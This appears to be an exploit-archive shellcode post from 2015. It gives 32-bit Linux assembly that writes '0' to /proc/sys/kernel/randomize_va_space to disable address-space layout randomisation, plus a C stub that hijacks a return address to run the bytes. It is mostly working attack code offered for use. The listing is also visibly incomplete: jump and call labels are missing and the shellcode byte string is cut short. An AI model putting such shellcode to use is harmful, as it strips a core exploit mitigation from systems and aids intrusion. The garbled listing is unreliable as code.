#Title: Disable ASLR in Linux (less byte and more compact)
#Length: 84 bytes
#Date: 3 April 2015
#Author: Mohammad Reza Ramezani (mr.ramezani.edu@gmail.com - g+)
#Tested On: kali-linux-1.0.6-i386
Thanks to stackoverflow
section .text
global _start
jmp short fileaddress
pop ebx
xor eax,eax
mov byte [ebx + 35],al
push byte 5
pop eax
push byte 2
pop ecx
int 80h
mov ebx, eax
push byte 4
pop eax
jmp short output
pop ecx
push byte 2
pop edx
int 80h
push byte 1
pop eax
xor ebx, ebx
int 80h
call shellcode
db '/proc/sys/kernel/randomize_va_spaceX'
call cont
db '0',10
char shellcode[] = "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58"
int main()
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;